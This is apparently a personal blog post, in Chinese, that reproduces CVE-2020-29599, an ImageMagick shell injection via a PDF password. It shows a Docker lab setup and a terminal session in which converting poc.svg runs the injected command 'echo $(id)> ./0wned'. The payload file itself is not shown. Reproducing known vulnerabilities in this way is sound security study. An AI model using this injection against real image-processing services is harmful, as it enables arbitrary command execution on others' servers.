joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

通过 PDF 密码进行 ImageMagick Shell 注入 (CVE-2020-29599)

发表于 2021-08-13 | 分类于漏洞复现 |

通过 PDF 密码进行 ImageMagick Shell 注入 (CVE-2020-29599)

ImageMagick 是一个免费的开源跨平台软件套件，用于显示、创建、转换、修改和编辑光栅图像。

参考：

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

漏洞复现

执行以下命令进入安装Imagemagick 7.0.10-36的Linux shell：

1	docker-compose run im bash

进入/tmp目录，转换poc.svg格式，触发漏洞：

root@f200ec9e1c1e:/# cd /tmp/
root@f200ec9e1c1e:/tmp# ls
poc.svg
root@f200ec9e1c1e:/tmp# identify poc.svg
poc.svg SVG 700x700 700x700+0+0 16-bit sRGB 398B 0.000u 0:00.003
root@f200ec9e1c1e:/tmp# convert poc.svg poc.png
sh: 1: : Permission denied
convert: MagickCore/image.c:1168: DestroyImage: Assertion `image != (Image *) NULL' failed.
Aborted
root@f200ec9e1c1e:/tmp# ls
0wned  poc.svg
root@f200ec9e1c1e:/tmp#

命令echo $(id)> ./0wned已成功执行：

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2021/08/13/%E9%80%9A%E8%BF%87%20PDF%20%E5%AF%86%E7%A0%81%E8%BF%9B%E8%A1%8C%20ImageMagick%20Shell%20%E6%B3%A8%E5%85%A5%20(CVE-2020-29599)/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%